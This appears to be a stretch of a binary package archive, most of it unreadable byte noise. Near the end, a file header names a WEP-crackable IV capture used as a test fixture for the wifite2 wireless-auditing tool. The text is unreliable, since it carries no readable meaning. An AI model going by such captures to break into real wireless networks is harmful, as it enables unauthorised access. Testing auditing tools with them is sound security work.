TVJdRsq_6S-)ײnk^tA1cr)xŸݏ [l"|SьXerjV2F]Ӳe5RRc$@YOkKmQ! U$ dEh.JY [0fn03o΄ns]GvP;fED|,3L^,\[*$zz(#/^H~iVZ?1tcr+,Ў&7 ߷Y:p 7?UuS"Jq8N nV,m;6GyҷYG}RgF.k߷h3+~ėPa {Q8$5i seʮ6OBO3@tC*;435/IpF5vs$3 8IoC> bq\$riν43y4'D@=uʏ}bZG 0_:SRJJȽcL܇. F\TQ`> \nNd6ӂ*2Dv Ql{UG*-7M$v~Bʆ pi.a=7/NW]Ts $X'u^Ps#/eM{9uP;!j*X(+xz`d,.u)(gKr=x; o97Wc:/Y;.y+Q ǵKӈ6Fmxd-5 JyX0El=R7$ 'i)6Fmu:mW(H ZL<4,\ؗ1: "ob2!{R *I|+"Hgu"Q[d(3KCJNHޙC,du88!h0oCņ4o@%5YgiyfH FS$`{t`TDpfYX ?ĞGT"z )M @6þi=m0ݐ3Wx1J-}h+X= 2[o#_6ǫS%/Λ{JVO-$%!ք^ 6͞W!{]Z%N1 whed) mNa&,tnߥ-' ~B B( \i0 GJ*)Su^Hz9NC!,+BH jD*~PXjd/6 ~41^7m(? $20ѪP԰!2" ]*ڂ2Z~zW )!va(3U bkQ  7%C~&?)(z8@5;;Ha;dEV9i]ߘ!l:8=uGzӧrS;Yw2eb$ '9@<&vw-r=)$ǚ&>Ns 7>k sͿOi;hJ0Vm⌡PPΫ/E 9 )Q 0O쇮Ŵ$Ͱc.CPRX ˞y'Ү"<\YS"!nyVR M"0T{$D~6补WX0UUA@r7-%Ƌ P }Wf tu_Cf 1[XcͣЂEYN $ծ9vLNT\ŗXLjWo2c^m&իCtU:&3_YѻC' qي:a!2Dc x?w;VbU6a;Ny`-acR[8f[oM34duq$:p`eZWC[dI[) j#_ap?Rc;tKmk: Fʪ$RdZ!53npzhWPNzi|oU}Hr+zZr #,b:˺y̞@sž?|wPC-v ^DTuWp6x}2w.jpyZty+ӣYxCz{+!tdUq<1y&[fn˩]o{Y&oOe+P}y||6B#-+}JIOmj"4=(~b"qA+KWןr۸:sbPBzA?`geM m߿y ;Gq[qndoZAn)U*Y;cKh(gx؟(^lH=z!~L|q2 駬;[4k7ՙZ!pQt txr'U5A/ quy<#qw9i1/{H#'-Nm=U*1himWP^$uBqWs;$B-kŤu>KbܗxU@ۊAmU~`g2BJ'^t>c>\6o?L~`M$HaQl5 b 0hZeImEZ$>W5Ϙ[h.\&gRrb}fߠ@DjnLrs+vsXG\fLEgrS:{}޸쫹|tPv  L/hP" 5pMG,s)uUlv9 2nt_2b)h{^ɝ^]ZD 7~G//:#%DJz/,|;UY]#k:t}Vp2\H U wDIg:v c7,&JV^RhxN:u*+jzT|bN`zQ*fŧ/]4$/i)'CV]İsgH>hn%z141喾մ\ꉀJBLBmya9{ YI mg wk, ^anq'i.S\I5 Sg)-b!o@YXzn[@"?nj4dա(\(&U~֫yL,_K?f'JNխ>y-+:>3HSzi&T}'J;e4&m]oCD# G~v͢;=OQMW:VwP]9eJf er`C *zC˰"' k~UN;=5^oG1"}pZ ǵ}%S UUw1Ph!w$i⹛uO0a֕P8PRb+S߼<: *It$(OU1 Ot0fFsl$UwAckӬ'_@Bk DmSasS౧!b; ÎOM7Ҏ5%42s ~(F+_&ZD |xϿ `d"~DdC9{^uTM1OpjǵCvMO{Rgw2]e,zs j1vcvK -DW0_تw)gޣ YlBL!;!8廖 Z|ZW^0N7: \ÎμFck>ĮDy1ʲBā4=IC_`O+z4joe<`~Y;M--l5\3eiJ$otoiڍa+fN1uRRř"ߢmJ%E3]}oԦk yZqwzVIBT{y{ l>!tl o,#Rv숸}("(Q+,NG5:j.[JĜQhSKRsiFa<{/YzvLez3e!3SucN0`R\)$eR 1V&,vj 273&$C~(}~ڮw6@O3.aO:q:hR6 *5CnEl5f,z7T\7RU\6dK3B8;Ԁ*"9V+6@(Ο^8S;c32v)%=/<xG~a }Mo6G:>F|e k;alY?IS;ST"(wu@ fNޑj{tB{Bxt7^{aC_N;PXg!.SsbE@[5UZm+T%F0gث$ymRGS:vW3{Y´׹HD4ԭSUc+I_ffzrIs3?KY-_/JL2iY.Ma(UO#Gb9"Rl~2g&kseZByUSi~ #NY/dT1\Xl-Ǭ5;zUyDl9;G<"ձ{hV,iΛR / 3W3k٩IG8@g6{XNn(gYdenYcLgAٷ'!Z"qY0BD0Qj[||]ғ\5/u^I\ uƤht b"G.~Vj=od`eUNyQ9dUg!fWP=OT|=ڔ="gl a`U8&~l):l;vň;"mZV珃vZIڂRin۟rb%: ]r}jyׂ 8~pvӨ}kb!$xW 0K'pdy'$],/ g3 zn"L:sIGϙH|ˑXFdM ]}5@jM ƕ~V)LH{ƻU1_!]kP_Yӧ, E囙wR`okw -8m7 f^pŴr -;?M98Dvkel Gd` w{]p ߳tl:. \MFiKVb88\^kS I&^nGkP\dS0>G%p޿qYs6Z ݈qtȲcdCV.soڋ# 2J s#\"JvBTf1S?"|?Dv8a+6tn̐4-'çC\s7MeźA,Q 5 {s뾄* /kx\(lL+SݹyZO8^chF'z DDqK^gmKwˠ@ F q&9f3J oW>7/qs _pi:zr~u'ʱ|^4xF=Κ*kF{jrx~]优c!ʍBWbgDmGY&oTQ,8 !6-.<\$ch~jq 7/z3N2w(g:,Vkz~FlS ݸqAoO$vQB' ZoR`Ø3geێT?fڣmI8Kh>h5Em AW@krym@V;<Uh67o*?6!rХTMu(_Ǡ- 'q; GR7N;y_kpRb!Jm0|CdΕ[W FXGiٚen7g6!=y=={2I06yGwo5P B2qW8_ns˙~w~$d?{Pߢt;_`WHYUpAf @ٴ릜ⳋ*E8ɴ7w֧PpVnL& %鎤EyjlXgP#2^"5~l犄uǥIW$w59O,Oi֑ˆ? 0Qc_mq2GDO?gT~jbւXKݻw\7Uhmȫ_1&0hc$텲 h )ucbYl@5>kFnϓ88QWaʻ$J6 0E9Y}m]ب*@4' n; Kf+-''M[GƬ(dv~d1X]ѳ!x}qGiT_%VZn4s?_kM ހI6|qWux5G*[P]An#䮁}_v*Jxq%Cݛ,C&<*< oAA)Bv{4x2hR$k2Ncyp GQ噈 4 NtP@Y7z\! &nFdH~tCPⷍ9 9Ƹ`ki3\I!c_Y0DL! AX݌H22縡^m_on-ݳGv܎m)<^6а_)ڂS  -JrJH4me+v -O$?߽~E "~/Mtt.E \}BlkZ@QQx Ct#%V{E$U3LVKuuᔶD\d<9mAB[P*4mݘ%ir|l`B]d$f<?;|[D<BMJ3J¸z>Q_ Ș5%mTL[kj13čXis&qMJ[AB 8n_5ڝ]K~CCŽZF*h~>K G{Dݲ& \y' FNl> Q1 GuGZof 8\e 8:HAzj$(UN$d=Iᛀ:K"h(1PFJNWۤ婏M.Y%\V0KMO,+)_AjLDLNN1 6ڥ7R4؈}Qs\MC;d}Hϗ*.N̍_ ƮHO@Р;co7 )Y]Q}R: ^2hq y]fRܵjI 43j>tS;Iw3b /ZڪT}CX 5eBUmUWue!38q ҶWa[ºf4φǐX->A'PZp7 pB1Y̐_o{"XmhZ㩷.l~z-p9?>}\d>+gHqs5yO]V@ -;o\uwN q} ^@w\ϲaD{caiCzB{>+/;)cVf87Xנ{m?o5n_drw.a 7Myݫf);N +µ1q Mdg\UG6čm7Y̌=hm^2L^#L &BfiQ2|7*ن'KEOui}tp101~qen`V;v.n,CՁEI-Z|+U|v A\6kN!ztKK5@ tR{qҺȠv mk_u:fGV(73t8YjP5R*B;gzJXŸ g<0KljjyhkQ"-[dވs!Maڭ-5VE/WiQI,];ݲ;y?:ΪoqK#+ BNcVUDM= >mD*3m8zD|]( *e `,v1=wmqu翾^QA\LZr,|I]R=47tQ6ƔI>EIgx<m4U@ o{1[OF>tbG7E@8v>vd~)p)HLWˋ-ؠQYqc;̺yhe;ød>U栐ɥbvi^TE$[*Wgnv20t4:BfTf"35T+1e5D._h )U%qV+ . @ w>~y/*"Y2*fL\3Ca;}-_U@6vT܄q<8^HlƎF׾[ N|^w`+pꖁ*g\p\#`4^R? ^"D0'e\Ү2lWpvw;il@xEEg/%fL †M-3Vq @cynn6+Uwՙ`EP` 78M n!ۣ~ (ʆ󽩇 _M;‰,/`|/=^D" -ܱGz,f$6bIE~!nlKrփXi#,n"/[CHw>4'cRfc@ \vm@cl@W5dMr)a{m%(r{Zِ 9?.L\sN{?Bݣ.8h1P=ξj[Q>82M@lY\Xw6շP)'WAH.Pǻ7dO*b 5D4A?78$\Jt6}GY AOW5|5.v"FQx D溵d\1C ki9t-rV8|8I`W#%k~ cWbP |x2C,i}?FaAgRXX*ꯦ6}gG%k?XȃټoRWh~BBGXz% NIebAٞ_CШdr/Fp;<:̣ޏQ(l{%P)*"LoÛhD㖕تBҏw C1}%l*|;Xr/ ݣo,x<6j8FYNыh$6&UQ"*ɘpK& \(VV29I{X/ :z7%<eP~7},2z3^9T]Thk;<%`Z"bZxAu=~=\KW}}*~!\xHZ '^"'uvd!Ƶ)ܜݫ;|ʆʵ Ȁ"8:UIȳ2މ~bp\[BRCmڑ_=\MЫ}̴] 4E9RLeG W_Q:s=r{nQ`%pwebɹ}Dh>c]k4&/F{d3.昏.bpXZ ͞`e 'V5 _)5S9>c~@fm|A(ylVk7x/Mgƨ+1´19C2̅h~u@Ss!iSi~-LzfZbwjf. *ߡߨMk{-c엛owlbl4d$zvCulsȒn6[O94t`ԫR/oֳECv ;qxZt\1r2ruCQ% N@a7 !t~iGM uv9}2uz5?y=$@vU9mh ^Y2LwEhqjK|ZD?φ,&{?D j0E@9q|S$RY`'G_sR}4}7 tjYgJ^U(ֆ?Bif,z]T Vb_7ixThxuS]jbzz;/!Fh4S%!>z_ʌ  OH|W7‘>:D-0>DѷJ4fYtl-a[ʛa\DC$`%322,XA"%NVME:(drya(Mнe\_;0ekb%ڭ_1؁u7$@n&%&xۀb=,iҺ(-T=v9S=h*KRea!M;"QGflEo8ټ}9~~KwUμ̪!Je(*gXMRw  d5n<+U 'cm(75 $Hx{$m; 7pmf6U{t^;y{YXǴQ̠dY%Kc+u]/ JARLEJePM6-KH >Ȃۜ,( ?&Xɝt3#݉AaugRN?xpOX- }Ҭ^x}zi1.}e6Ja V%LOG>{ A 3/~]-xݳtړMc<훸9ϲyK~e >)j>)rߚHb? ds~3_,p&1zfk WW|nδ>j`Wɾ ,gui%$FKUl4!?0`d@M=gQ8E{?a~c>ecѭANL&'Ex(HH6,Mo>Ovx`G"a"\v svPU T.1""-  RIAER1h HGޣNAdp0ƾY7` B AMgl3a%H"xZ[  ^v :25azIAqdٷTHIF/i۞cba%) ;J+ɶXN*SGыeeh_gX@Ym@h:bSn6j>SWۡ,!I5SL2ZoP8ve,UgpѴ rɖ 𢉚-_&8ԋ. xC[ȍ$θsC|(*%Z˂ LE |;IfP2!I}"mh'\E\RE;6w:&THкЦ"v'}9(4KC5FƳٮu5ML섛;mtbU@=(+jr09I|fǐo'r#./PPSDGt#Xy9P3~ ӳw`;!BxQ 18` k>^|g+D e>E?ïOWdX_5KGQ枻Zlh/8T(d!z0C><6vuɩgs. ȸ[Vo)Nv\좁t <|DJt̪cS1c8ws qݞxf(f}3/D?5Jb⪘EoR׻$٣!5wOAv"r\ =oUgTC 94ȭd Q,=D pi@DV^: Stg7?{gwE20SkAʗ b[ny\>QJi:j0g+ @JS t"4oԽ4T-4)?&ӿsҎ/Uo3a^H:T%3q>W-l{83}oNo[e,72~_\c{V>+=B]1h{]~Mx$gX쵊oW^TOU:R3ۥL7L_oCesK&:7 hRq`%^OL\yv&dZPa1$[36 naXZmOb΂d݄@"s-dέ #f\bRC%'aeOftmy<ޜ$6ϏfFG;[ʐ(_k,6摼R8=`h_!cl9C@}ԺaT!hFo%A\NW;N\z括'.pR"K|8a>yr$.]U?.s㚃qUR#R|>ptP pro:˄r:l svh;Cv\$/1CmyJ@xdj y;%A:b5}zdBO)QZ{Q=fՋHB#˗ثs}cWhN0i$2orjA֕#fs( bƒڐK jz0jsp$hĸTUtǢX>`+GF98'5ɚ<!@4b2;Y[f[l-f!U= Һ?FT2{=ZⶼENj8Һ:όߊ mU$2st(86b# v~K E~sNM:^%,NA@\6HEQ(=~Q} `S6K;USuP|T2# QLLkao\BZee#O#Ski~ W|u^'?" o=yC|3?$sKX`P%% g +;864k/݈rH/Rm* R9Oʖb{žp`r0k1 .=@pϔ:\qz~ [D+z/)Z޻?:P+Q?zCxT A{aa[Wpkj3\ʉ3Ӱ7pۥQ"2:9sgxrjq '# Txָ,=-\'ʌ lV .?`:IpZUoّadc3N=H4@*Y c !ݥUl-op#Mʸv, >. L-}$Vqb25.ۗ#Z6S-VߛE.jwgpr)"%Pqf=:\5bNx*>t7}DL>>1+_7?1{eE};-.`4yԕ큪A BK'0:cFE!ZTE1ΰ|h5AWv i b72l\bֵkHA3KaM,Xp@4$zr5]xbiRv&m| h 6,n)1sY_+߾;al8I =7g9"J:1< O#U3fz;rcg΢P"7盭4Ƨ>*#ʢ@?٨Ǹm"`MFA[@|.bK)3~֬DANKt,RGYE!&m{71],@F<%Ͽ8 t@M=GfG'DѾ^2Ia;q5uWgiڇMLj}iI_t[/RGlMI}pw}?uNE8V;- OOz\tͧ4 bPCƋG[;q?TQ,QM)kڐfT\*jISUU2lC#:7/~UXuQM(B&e[2VɘŒX=)XP~RX#R>#L 'Y]khݹV]-/os@}(i` I! ĭ{ qBD_v*bowk1k)JJne%Z CQ+f#N&Aަp00#g΂PJ4 LVlQSizS!lup_&p2/kE^ngNtUO)ٿ]KlG:#qwvrķ/CxmhJ`<ƩKW!6RP~[*o>AȀIia"ȾpsME=j0e9 $MBrcvOXzࢱue STkv yb%]o'0mw[LƁÆM{ʠ/kYQqx3GG̽W,)Hzo>On"dCq+{9 gx}Ǝ8)%2|yld޳ ý~A ߇)2R|f7ߵSE$E6x _P/X}LPb~>'C :sַ\:r ~Ԋq<6$ւavXX}6 ocd:\.W:RqN Az@F{A1 nhi5d(pu!)9̻kkؙ8dR)3t-+?<~%|< 89_P{;/>3ջs$,^gsƷUV#3n`+FARWsZZ:P xĿ"T:QrSYH!$\3\?= $lp Xਫ\|ze2􋗼6aVe*uhz}Š uY5~]=x{Il\n?z|i0xe+g,XS9ГI]!_J;`9 c|̉_ . v&4%.NRjjcxbV8 rQ|r,.4\IqwTZF}Ybj{)ۖ t"si ? dզMфezQMAnQ /ߝ3\\4ϦE^BաMFjז@ݱhc !:ՂK󞠌$MqQ3QkJgZ3ZH8JV~a7~5QA$Wi\]A HWZ Hcx!6U :9VSb}]"1QER j;Qs|~+`w,—9-0ND\W/.pP(W7%ږS_+q$6\t5U=ΩFƤ< ZAe@|Ї=Z=9!;&I t׸+as>>"ǀ ԝ}F4#I;ӧ![k u]T%zk$#y]L&_x!xxעi_V';1\ NJ)%n)m4wcMdQoPbzT*%I[;;ҋ8z+@#Zrռ鏮XB,Oݒ{$Hi /&9WVRF)%Que]Wn1 mjΚ^O2isBikb1ev3[DMM)B)aT&2A5iR(WI!FK&L6Om7@-Ve8`7qۋ43X8c$K0P "8v^;ӗ&%Q *%"qO~XfR?[@ tZ!q"u@Sp*dpU_!GzG2-޳ۻF]4jJƇb~v:_/PBj -ՕlPb#H!Sk%f3d47]$NG$J,\fLŠE(FG`>gȸy&cP2^I`h^9hb$\Cl}[2iDU7UhׄSjC"Bߩ1`ZNߔGlT\LW\!0DʀL@1BnI[f%-.dp plv\FVsrrN& m \js/l`m@B*!R\y/vdg|Y;LS,ɛLZBw#31[hKVT;^2x£ii6b %HObyB0]R2"{sHl虁"5=Ҹw|!z(RphVO[(нKH6{ҞL@+)QIG9}J; ߥ!b*@O8S(ֵK%2bz:6)>gکãpNWH}ʡuqE|~ NL:_f)n6CAP0k.{,K6Rn7~W6sw87' wxOW&S+.#cEw@lAc,g?8!Y+IcYΘ $[.6ݖ +JoS)/g@wfxS|샪XZeeQvլ|b]jӿ %= dqa AN"cl ;ww'8Ţ Qul@ %&-k?$E[S`䂜fڍӡ$eE}RWelrɭ7LԳ<͌1C $XWyD%s: KR .2zͿ('-ۑ>TB hF xGf o[] A9XtfhŠ=!q/? &egoiҝR.Ԡ1Ʈdez!m6Af2crnхz5O~UA,8O yyY'A/i̬T}5#*|h,6G@A8; ׆u7(JY#Hfq2/}jܢG 4s|ȗȟw,x!ʝRp,0O<+cfC VFz*^* N7:.Q7m_Ld 5oPo@VO2 W͕jN[Z ,J *ȃ]OrQ9D JnoR،3RzKejH1t.OR) ~SsF{#x;eŖm5 HL]D:UB9(IC[;〤̴ٚ04I>}8N;] (;ײ NY,i/^W6hvA<^:joYx}P0=|YDOiJfMž=d-T+K$dj!bfDoo}Zj}dHOze)gqH~;駚CQꎷj!+#$7b !Hn옿^U32PQ |,[n"΅ʝFcL_2դ"[yK@-ZZcWaҽ U4!AT\ ^嫹!TMD=je!*}CT= mi4kApE؀j#uG+j)bU<& 9/IAyP qgŠybd! "xt^_K) m,踖A8|~/`eR^՗v#īTjީKp7"q+b"RV /ӎ4mHې+_`.qp5f[pgyR)5nnqv<H)"Um3!?Hx4PP=BuƆiE v@@#]^i) X3KbAj| SUT%&Uʎ2*4=4Nw\^/4):c8SɭdTwR5x>dr|gh:*yăL<Pk۴Q1c[Yrڑ_ ã/74= Cm/ ) {@;URMs{D[^ P=%t ( v?ϡ^9Tk~>D/sl$0}yʡkЛOC!h*"œwiN#}( >?995&/VDώ,qUZI('UJ T ٿ(-F (,4d5P!6)C^-!]i+qg}o.ì_?:ߝoػpS| /x 7j(W9` `0@zܸ]hu!r1*]\] s l5Q'PET?V[m6)CȒYj^vb~d7(ڴz0V݌̀АIJ_A$R4b'' ;7 GB]fִ\xPsCo9L'wnFE.,\n6F׈tGP_\Qn D9Z<I<5cCŢLGy[ԟ>J Rx095f0-UdKͿ#%[p0,3k mW&Lkvb -9M$^9#- |fQdy$5bOayOR?zԶc{e/ wnF#ܕSu6dcݙCMgejU7@>7Qb{y ''VQidO=ZqC JW$wf~@_&7AX1O:󚲓#H ۉY]t'5O"Hz^~Ev62|E"|&{$I`#4ba:DaHyGfzD\E< æbBfdb LR e<`c oxJ 'B(֘d^8=)3t&ez{֝JP7OTf{){1nCn [3Lޠi%y3o^E33%k-jx3I y #쟨ߔk K$>~Q%SX[;DGlNJ~!a>EJ#p,mlRXLn@rP24gojVH' kpݮ( e G6=+(qO}>3/z96rv#0 ;PB{<+At(aX3]Zajuyv/EnnVìv@\#l#ԇ6|Lwu#[&c%ph*xF` ƀ&%i'"yh%*uh }zeh\xslt$|ˇ~5՗ //p) <~Z^lt ڲA@'3ELRT-%Iz_71:y_ÙG1aw3J)s]EZK_>fECrŽG Lَ% CtۻPT˪}@FV=!A-gZD@ >LۡUBm s>?0GJiY3W_g+>h 9aXWR&u#&Lj?r(L-q5BjKS=@Ӽ}9R8V DpN1=Wu/K-Fi@|ba }\3( 6O2фqJ?MF#w5:,Y« [W x[^klc?(_䰨{5 wn6uf;xnSc V4)m:< q@qJ2sM&ً0pijMl'nt2|s'*R-|k皮SV%Y6H" Q(m}xf b}/IV\BQfG/|^ԒM)[qⷁ r@fvp`y =^y1G2$nf>`mdJ.YܟX92KvAji;9g\LLd6)Ӕ@Aȥz~,\85܃g7s0 6?#*jT)bLCTCMi#g} ask"a 'rP=rV6Zw\>]R^H!e=z wQ3jL7 x˄ <]>xDNC~eB³1NxfĻ~7wƓRQX}K)*,qoR6D6硿V=.>Pv 2dW\}L|~HG/rYUZ"FJY(H 5Bġ8VYW[vU(a}:=8!ѩY05CD)s$Or 4]^5&R7>W~j;[ % L_ hf^s~(l{uuܡq J,6& ڬqvK`F#[ jcҢ>C~vʬ^, "e=( _NaR #+{ԶJE', P@6ya/s{`ԥֹ4JeMYZCKEbⱊmv2˒mH_Nm/yԣ^ F@W iT3^mY;!<.y,o1?BW޳-Ct7)vf4Nsv-USBjY93kB@2.R*er̀50gæ$o \ 8d/D  MC8 rKͮ}F  \\}, (wf #i\~wutj<*m jrT(\Гw[2c^W$-qٮ6G;|]]l#`,${Ck)$YI@KѺ?Z-2kN¯>\ H`[[(&VȴN,PX'*6Ѣ=s9kK%e:*39Rw 'Y[N϶wFW$#2hq@Cx# ^.zʋ3 zt~d.~ZV!i=>΂<=8|m.E#ΝV~+T#$L7TeUl۝e954[4`%.tD^cE&kQM_gs{eWr)0Qa[?xn*q31JFR7,62ʸOZք\~W-ָ̋y$&kmS\J.5+ŀ-:C /,o!tSg:f)0 ѿ[qo/yh1.OEX8XG2b3"TZu2S A~3V)P´l!.|~vo48vKE,r"<3,l g[+ j5J(m?f\n/v ,D.OsnNMbg!yA5Vo\WkUY]pG" 9_aR!q^&,d h먟rc\\rJ^;A qBt:SvD.qvN{u+tPyhCwꃌ}fb0\6sܳx! :W#ѿpX24yIv5BEͲx>ݰU-z͸!}D|NbU‰#Fբ>u7RQ{H}m5EçVgrt~4m$!Un7Te`R$9DITWIy {*x*]I n9& mX*$}ixNFTT',[>[@tEֻB>8\9((ԨX"<ӡBŗw7QtT.sIDaE[$4 1Ӫm?TC\ [rIcO br hϢhE3I✲qde.?J܍"Vt9gD,@5C[Tt6017 " 冁-$5Ew\ttudHɜ\+[?YCUo0ZLpW\t&-2ҵH[Uq!$dU*̟c` |Lbk1lO9b> O'kRh4`=&A2CawoC( $ xxZ6gbje|$.O@M>guů\LilŠCx=  sf:)6Rb݌2+}W.aB8j7G]mZ2Bh6/]wQfxIjJ}fиORO"7&z+E@j;zP`u~=9Bw ė}~a<,R*X *rozvGBh?WϊzGYqgKau8$,޽BCrMa}vc;6?ӎ⊇h'yѯ]G j'y-rymbKIcZV.`;L3̑ 'lW 2A88 BF݌0B?c뇘e'tU_9y<|6 kp=2rxUi~EdETNƔ@ gd\T [%0NdSy#6Y0g<u%A1݈DOQՈR2T_@.rS4Qu&iuV{A#i]x>FG]/ੲMퟲO9ي<@WH=|3 L`}CPة0)ً`?F F}w5%Nv˿vbN:dU,ϧG C}S)e{aG;]7^ R!@c=7Yr*o> Ga .x9Px+'u[$uܥb*VܱtWk_5E ύӜD}L<:,0mγx.aN]ITDoueU@o" WB[*q$A S4+Zh*ljE`# :vnx Zf5A_zՖ"7>:|̅Tル#ϔGjU8poeWp.U7qj廓$6rBṕ 0/ Ob FR,?I&_"y"+`$LbCG"M;K<72V;c搨$Y`)xU"_M/H.wAt#;נ zF%`+@N` B&7&3qL0:c}?wH7')MB]eF j)s_k?Tm(zdG3+'y 3.~ Nt#P"C,28k`u`KOQB-H(  J4 \vsl.;.Q1U@tz/*_>AZP+H.A]`CV|0ba$=_#=]~31$s9WXfvm3^KSihc^747,U1O  5oQyhnk"YPB6´. 5̴R7[}B7"ڍz*ܝrͨ&^4/:Gy ˱H=\S?Xi$;mTM9'hFzI@;ެ6~stvf?vIqQ.•xX"=ԮWjR3C1Yy¹XpYjM-R&#'KYĒ#,û=G1aʌZTۢ.J,Kץ[D{;+2h)X\g L?,`?^;Tԫ VGor# {b_a-U# [>/ `ZkaӪ4-2yOaY޴Ad:?bm DltN+ycB(Uѽ=wVDF67f=@s'EX(KY1'ϘgqHTE}b['jip貚-IcWz`gZnڨ5>E36Hm~C 7-!b 1}8"֓FGI2 Pd BF`$O#,l_ڑl^˘OY(U= qgkBYd3=uGACbIpt |$WO/qd)c6,\ )}L_P36&n@~8߹% qe5tv%WG1f~䰶!q+عF*aFw(#xsw;<)Iv"5QPYydH7oz`\t"ui, ~ŏm孆3We^ެn/"NŦ6ذ57i=j{ r[%_ЇyʪXjAxjc .jVsI_4E(.OOޤ49=/( L7tN`4x儨ǢJoCV"KUG \۸tԎBXcz\iB~MHa:j- axvS$A:l*vlEwFՄ;{G!>/MZxWD׀x{c5#=_oTRn(1\6O& ¼P2d=++V 8] yw/'Y6'*0z@Do̯iFuE$ZS o-'r1\O9`ܵ +A̮=*U+P1qU?霖{ t1Nԇ7PPDJ\!fmV.,3 W68(DȆ=a WLLMWȺo2BZ#&vOcBn/b ӟbOn>440KI)m*f)iLU\F}*)V]3u<+ R0"6j6^j~)1O?=_nbYLe!mN&~љGlJ%1W7chꡔ5,a] D=lpF$PUS>יwYn '*w<y[A'w߮ NF9G;K(,KɲY]wk sC'Y.@Dh[Ȑ\xD,9&QtT` Zj=p(///QB* aTuoݦ.faҢH-%(u*\m`$KN[l2F9g low/!eboѹOe<o6ÔsӚT`#R[)܊t*!2Tp͹b REӎ쌜ʺ.SB`/WCC0>򁪢!V҄7_MGFkvg% pɬ mЀrrKnb*M"4 'L.s窺U2f@,Fh bR@7|Lѯn1I.uqჟ*fDpRI |t'IRn|Y.elv fԞ ">ڑdJWsې ܛ|">_ίWꍷZa;?&99o]%1[/Pł&NwaNjfE8QiSbE=IW1eMU] z`?$. .TU#EO d?$Pz zn4l?&Kv1gY٥[f;%xlXDm*#765ĭRd]=~rXtcx#Un78̵G~ Q%IʊeD&=jE B}=)-Pv& x;a]|$oH Q;!<FA`1UbS7_FVެ'i!Ra{@ XO3,9hk*79Y}c{ޜAo~-RtKc/hrRY|*;/UE]n27GR?gPmL̝ASXq»-OG~ | @G"`OЛ!6l; dgZN Zz.p"ⷉjKf |%$eX7$1=uZ x&=Ӹih:.:Xg䫄S`n'9u[@0MGorS(egI;= ܿ+)x,m!Lt* *2gY2숱ӓ+ˢ) 8(H,kq,/`V'6(^/W߯S;@Qi31! GB#!hY6sfF!vzDܹhU$m7"W03. }80HE *,9V9P9$G6BOu}D<0Rn?7?LHf>GIvk+eH}`hz& 9VJ /鬍-e~"MX׊"^$?,:SćQ)"o BP5cK[Eb-ٔ]C{sޯR}bAVTD-qU0;< G^Vuۈn["aˡH WM1slβ{{^I}g 3Y{VkLYܨp%J2eHښBV':ʧ[M _&vhqN6@GBPv`č Ș{K;XwQZغ~ָRlEKV IR!Bmt.\}*JZ0T!v؆5iҚtU$lBWG3mY.f\KJVT*gman$ @!!9]WU#2DlY MhXH5 On|g=Zʹ?Zف׭VF"|Rjc: [DEE٭55:\΋ePzȩgn0C[3_f9+5 ]pak]zug_ bh!W:jN^ڰPZ:%cFKWm3ōZFdh Xfvf hgeL/c n-`އVIfm 06:Rʗ=оg;;bW/̏wh-lsctDmi?Q)mp]`nEyӂ̓)dtx>&D- Qp)D1;0u7NBN9=,f^ۀy4'ֽIBݔmzIy3nj 3%P"j|" SmbbJsc~o> DH6f3By4 4BX|a㹖3(&ΤXFtX 7%0K!=?$IK괞dOs|GR< +gB3EV2zoڼD!c =(Skl!aa)}x;~UvIWA_NGG3-Г|ՃL(׀NapYU};Oܬ8łY"O?>` Nd?8S"3pN4;񽾤3# O [e0 WnnܼXIWr:f0ɀC,A y-^D(ʠsD`Qsx^jirC@ˋsvLQȄ)MFZP R=IGx&86ĉ,Z} w(T-@kq迟-g4v? EQ"l1ԙ<>!\(YkDM0wnSp- md8@:4]vxߊ@0LiQ$+׈Z, _PM?aލu=;z!e=7ulVM%򢝂ID/=sV(I8$+x%=^@>" |]Ob&6+H4fpI?[.e+2iumk\6 #PJe,Hꍠq9%6ꚑUc:OFRy^".fT֗xNzP@L`gmx@[J0Lj1Rpcxi?:me FzbfV34K6.,[pfgK;'+wj;gaJ4w;qpOy0Q';jókqHN#wW,rfu:9`f} R{HoSMwF`A["SZt@g)ͨ ;l]sA`}R0 Ôcz#!Fe￞×?OzP8x!8{HC)fX)#W!p[qq|>sfnr-۪tU ;2O閬?Wd"1kGv!\" olɛ0[Կfa<3P$3[q'l ,nҡ[7<`b>8x۠V`>پj(#^S\[b}۝!Ƨ8J.p#OG+V6(ӵQ%r La sIb8[+,%^*,$(J}4K7rсUK/鿇G,C\\[Jk{TW~A' UL,/Τ#$UA{ek9xW  4YߪnfJ4O`%mv6FxP6|Y{WȒ>OU"a埙uGwޓ_(}V Nea&'R+R?yzz$_M 8=Sg xc`Eή!4I wweXƂGfY x/MjyY 9\QSĜ{{+pCO9GّqƵ|SiWɮ`n-F/Xe}}6YSA0H;1%3! Y8[og\pQ;yJ=3i.M`ViR'G*~!C^  GxuK" CjWrh=PSP }-$Do52i# 'a\_kz[7A~䈣}(h:h%]%x*TVY%H cRC,.7~CjO~2\WׄiFT1Awn4bEZ.6<>À6[+|4TAQ? ]7J\\ Xz9|*}oRK&o,YzJ[A6rfx-]f݅ JkR\z_1$$ I~8,1bݮy ['Uўsc:[99cyz-dͻS>֨QXv'ae.;Mn ~!TircnfԂYWOIoN=;+gY4d +/kߊ.2+乚63Pm(lNZFE"vҹBm̈POⓤ"iUF,pf5*ڋa68*ql~ ,<![GmrVSWq ဎ_/ٜsJ:?<-Nj?Ϳ}t@ALB; 9y'u%J_ 86>~cawZ4~sbSRUxԒinK":HoO!;0 |$uWz~wH]d mIߏfo ։ w1eE1ǍHt :x^*jLch3f ey#)3d_xR:߇HWчru DXC$ 6W=کbwf<# W e*\,#}*t(sOs`} aGدӾqIDpG:7K: ^E]St1Cў0=?dy,U='0Hk=(9\2Kn$2x`= .?+/ҁ?9}F&ڛ=N1&F/喼-J9KEj;X,hqGnXqS0'@, KR`0c 劙 _KM(zF_GlçL|]Azypޮک2 ]ź6p>yS: EDVQ-V'pIc2Y #{uM>/\6gQp/=22lB' x՗Ȃ*+NXT4j+Ǒ.kimc0Gϸ=ك}iϪi`1l`@*ĞeeU3g~[~(f|V̋/̷#:nl6~jZ?`BMI:hxN5Jqo6NT:;J *@= 5oceOb /:qlȟ:66#0︤:u[?=BA']d'XQ+Ma&wifite2-2.7.0/tests/files/wep-crackable.ivs0000644000175000017500000202440114437644461020140 0ustar sophiesophiex+k:Test Router Please Ignoresւ=rjDZ(I#mm iɸ/I0a9Kے0_ok|$r'a[w7Qj([$5.C2m0DQ ڔHqtd>CX$rcpU.3nnMuHFg*2 ).2M$hT|,8v4y$r 